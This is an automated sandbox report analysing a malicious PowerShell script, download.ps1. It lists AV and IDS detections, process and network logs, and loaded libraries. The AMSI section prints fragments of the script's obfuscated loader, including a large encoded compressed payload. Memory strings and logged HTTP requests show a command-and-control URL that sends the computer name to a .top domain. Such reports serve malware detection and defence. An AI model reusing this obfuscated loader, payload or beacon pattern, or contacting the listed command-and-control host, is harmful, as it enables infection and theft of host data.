Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579458
MD5:e8dd1c8a9dc723dd3efb012b52d487a8
SHA1:1d59b6fda15b8d29ddf665b5fc4abf715b6f0186
SHA256:96d6d2f4e613ae1d987e3f1eb72237fa1308e336e06cffdd865f0a124346a474
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 6916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4988, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6916, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4988, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6916, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T13:48:14.348468+010020283713Unknown Traffic192.168.11.304986323.50.113.178443TCP
2024-12-22T13:49:30.199477+010020283713Unknown Traffic192.168.11.304986623.50.113.178443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T13:48:12.520278+010028593911Domain Observed Used for C2 Detected192.168.11.30600511.1.1.153UDP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: download.ps1Virustotal: Detection: 13%Perma Link
Source: download.ps1ReversingLabs: Detection: 15%
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.663085801790.0000021A36A40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbllj= source: powershell.exe, 00000002.00000002.663090567187.0000021A3709E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.663088206745.0000021A36E04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdb source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbh source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdba-k[ source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: powershell.exe, 00000002.00000002.663089995476.0000021A36E5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: powershell.exe, 00000002.00000002.663089995476.0000021A36E5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdbdw source: powershell.exe, 00000002.00000002.663085801790.0000021A36ABE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.30:60051 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49866 -> 23.50.113.178:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49863 -> 23.50.113.178:443
Source: global trafficHTTP traffic detected: GET /mes6v8wj5phtr.php?id=computer&key=28342894733&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /mes6v8wj5phtr.php?id=computer&key=28342894733&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F9F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1FB96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1FA66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php?
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php?id=$env:computername&key=$xcdjnwvua&s=527
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527p
Source: powershell.exe, 00000002.00000002.663085801790.0000021A36ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.663085801790.0000021A36A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.663087374251.0000021A36BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
Source: powershell.exe, 00000002.00000002.663088206745.0000021A36D26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoO
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2EAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1E931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.663090479972.0000021A37020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1FA66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvV
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1E931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2EAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F889000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF92ACD8C922_2_00007FF92ACD8C92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF92ACD7EE62_2_00007FF92ACD7EE6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF92ACCC45D2_2_00007FF92ACCC45D
Source: classification engineClassification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sq5yjwea.gmi.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ygi8e15xtdl6k2c.((-join (@((6829-6762),(86691/(5492-(13082447/2777))),(-4549+4661),(877855/(3417+(5722458/1491))),(-3224+3308),(-5216+5327))| ForEach-Object { [char]$_ })))( $fxb4tonc1di39mu ) $ygi8e15xtdl6k2c.(([system.String]::new(@((219023/(21722505/6645)),(891540/8255),(-6561+(64424832/(21774280/2255))),(-5726+5841),(4886-(8169-3384))))))()$5teju2orbwapdgq.(([char[]]@((7253-(11996-(12431-(59001782/7742)))),(-5740+(11936-(5419+(1103850/1650)))),(594849/(-3209+8568)),(-1852+(10186-(10384-2165))),(2284-2183)) -join ''))()[byte[]] $anxc5tg2wm9u86b = $fxb4tonc1di39mu.(([char[]]@((-6992+7076),(-141+(167328/(1171296/1764))),(-3238+(-1990+(52125464/(10090-242)))),(384408/3372),(838698/(-1153+(14176-5666))),(864561/8913),(-7252+(288+7085))) -join ''))() $atq3ip6evlnohyk=$anxc5tg2wm9u86b return $atq3ip6evlnohyk}[System.Text.Encoding]::ascii.(([char[]]@((335049/(7727-(10627264/3533))),(-7915+8016),(-10011+10127),(335-252),(-5939+(1234+4821)),(466-(2345376/6663)),(7803-7698),(174130/1583),(-4207+4310)) -join ''))((hz1cnubfqdw7jvkyo3gs6xi5m0e "ZuB6aWpjN3VgYtnrIgRuPhikqFYkvRUQSdBBAN2Z61py5nCoHZjmNEod//ZFZmBF6wM5zSbyoZGvFbufJsz1e0+yhWPldS7iSrgPk/bJyNDOhJrtwp2tuLmE0Prq/QvDBpCKhZ6q/NJb3c0IjYsalgwcRQAdGAoGCxUE0BUQToqMGguBhYGH6occ2VqDnQ6J7phlRsVNwGK7PGovJ9aotLEd3UeT1KvtRVDMkYSC9Aq/DMfbFyXPjbe07GMY/+8H7PQxxBS9zZUZ+A9aB6ytj44wqyesK8uUL6DmEuGZ8uI+RSsbmvxgCx8NHqRdHP9eHUWWEak/XPzeMr1RtU4LFP44+ylI2EAdRDw61fq4+atyGOs7CSod4qtOaUrxeJYswaIc3vPcCEpZuYiJtlebHsW9ic+43cyHlI63gLOwsKoYEcIPxL5xf3TpHJKm1yjGgqRO/PEfHy8EScWVy9u2P7bfekSD9q7C5BCfRaPGI5JJbSfXFJirpk81GhoDKegTNBX4RICidLpFW0ppE+cO3b2znTqvVBBu25txwoT2KM+XF8kyGdSViQawUMPzKUIty5xM/7AAqvdyrFLE6Qdf+nTCoBx/KRuDz61ujwcHTuSJgELBg7cvicsxPOCXbx0HxI2eKw/6nkNJGHrONFqarqag+0wwzYOtz8ppB7e/Ixkls9PSXmXbjfQo5Pa9bAPeQRgldDLJvXTS59d+FSD/tJHSGljwvqiiKxwRBLfWYwF8pmSrJxjuC6Md20A1eFKG1uYtC4t0bDMCGd6j3mHFjC756Zo5zGiZu1IUstY1G2X/+S/bb7rPfXQC3shg6Y0on6uU5BeMtgiLJ6MXVvZPKOYCHQgg8xu1EtzpGrt0Wh0Qgcq5POmnLBHL6qhfzSrvJ/VOsnQ+aSmJFcusxJg91sYajOyTXRqcttQfF1MZRIecmcenRjZvJmVVbHfnqqBOU2h6+/o6dlrROnABDqXsjkMuxudzvQempH38WJCNbyXKWIKL4ixlkol82RoamYS2IoY7HDks/obdKIr/LaPs4Y+aoJf/YJOTvHpJV9tEPfAJjto2/D99U60a7C830MXhxhiFyk2k+CoZgM15IMvXeApegmO8P8JIPPVHGFwQ/6u/AY6k8BbEyrff/Bpi/I+n1jVMEJYDXLWcXVs+hpWakpeq0hOXCzRsQUnK8TGpU89j/0yYSRv9YZgwEMNpzRY+lTqFp42JoFjvRuhL/rjQbiohmdBQn5oDV/IPGYN5GR+VE95Kbg5siSpFJOXg13XqGd5VK6ZG8kBrrhcH2wC8DbCjV9cmizuQc0CK2tgD+uVyZn71+bwHaKDK8m0jtCOSR/yYhNCDMjT3ZQB7DBcQxApXnINlFlL6QlwdR/0gUU/hOaA53QfTlIGFmJJznQUMiwcsHp30ukSvodePpJfEsreDLhWs18pEptFkiQh33Z5FWATbYi98clLOsbzg3uw4cg8vLXPDYXEfU/VRzHIsmTDgIQ1J1Cb6C/sO33Yvvn5AgiNbXjRJTnxoZ3u7T13UExxmWuopNomvlHN4G41fp/r+75LhDDM1W9uv+I3tE3KzqOgBEJdWzW8YJPKNo/RghFOeHraXGc+kLKKbfNywWQI237L9cEcjUkBLXFwJXZWranP+S9lfS/9yutgzFHk8ye5jzflyHXnRljWkSX+rIOYFmlgjOrfzCQgRMQwFqmOoz17fn3GIvQl6n2wmlfAxtE8vI2je/eflj6IsnuLxkRWTBHV3n+bLVE5YIkg4JCbifA5qePTHV+K+mKRnT9BAr6ltNGxLxH0govfdaFhYjNJYHuKJYvWBL3yApRRgPaznwAdZ9yxmpNP77enO0e+Cx73pxNbxbjX4n2HimcvmAVOWMoG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 13%
Source: download.ps1ReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
